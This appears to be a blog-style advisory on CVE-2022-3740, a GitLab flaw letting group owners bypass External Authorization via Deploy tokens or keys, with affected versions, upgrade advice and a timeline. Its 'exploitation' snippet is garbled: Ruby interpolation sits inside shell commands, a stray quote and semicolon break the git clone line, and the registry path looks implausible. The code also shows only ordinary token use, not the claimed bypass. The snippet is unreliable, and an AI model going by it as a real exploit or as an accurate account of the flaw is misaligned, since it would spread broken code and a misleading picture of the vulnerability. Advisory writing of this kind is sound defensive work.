CVE-2022-3740: GitLab CE/EE Vulnerability Allowing Group Owner to Bypass External Authorization Check

A recently discovered vulnerability in GitLab CE/EE, assigned as CVE-2022-3740, has been found to affect all versions starting from 12.9 prior to 15.3.5, 15.4 prior to 15.4.4, and 15.5 prior to 15.5.2. The vulnerability could enable a group owner to bypass the External Authorization check and access Git repositories and package registries using Deploy tokens or Deploy keys. This post outlines the relevant details, a code snippet demonstrating the vulnerability, original reference links, and recommended mitigation steps.

Exploit details

The vulnerability occurs when a group owner is able to bypass the External Authorization check due to a lack of appropriate validations. This could grant unauthorized access to Git repositories and package registries through the use of Deploy tokens or Deploy keys.

The following code snippet demonstrates the exploitation of the vulnerability

# Step 1: Create a Deploy token for the group
deploy_token = Gitlab.client.create_group_deploy_token(group_id, "my-token", "read_repository,read_package_registry")

# Step 2: Clone the Git repository using the Deploy token
git clone "https://gitlab.example.com/group/project.git"; --config http.extraheader="Authorization: Bearer #{deploy_token.token}"

# Step 3: Access the package registry using the Deploy token
curl -H "Authorization: Bearer #{deploy_token.token}" "https://gitlab.example.com/api/v4/packages/group/group_id";

For more information and details about CVE-2022-3740, refer to the following original links

1. GitLab's Security Advisory: GitLab Security Release: 15.5.2, 15.4.4, and 15.3.5
2. National Vulnerability Database (NVD) - CVE-2022-3740 Detail

Mitigation and recommendations

GitLab has addressed this vulnerability in the following patched versions: 15.3.5, 15.4.4, and 15.5.2. To mitigate the risk of exploitation, you should take the following steps:

1. Upgrade GitLab to the latest patched version applicable to your environment (15.3.5, 15.4.4, or 15.5.2) by following GitLab's official upgrade guide.
2. Review and monitor the usage of Deploy tokens and Deploy keys within your GitLab instance to identify any potentially unauthorized access.
3. Ensure that proper access controls and policies are in place for group owners, and provide additional training and awareness as needed.

Conclusion

In conclusion, CVE-2022-3740 is a serious vulnerability affecting GitLab CE/EE, which could allow a group owner to bypass the External Authorization check and access Git repositories and package registries using Deploy tokens or Deploy keys. It is critical to upgrade your GitLab instance to a patched version and review your access control policies to mitigate the risk of exploitation.

Timeline

Published on: 01/26/2023 21:15:00 UTC
Last modified on: 02/01/2023 17:20:00 UTC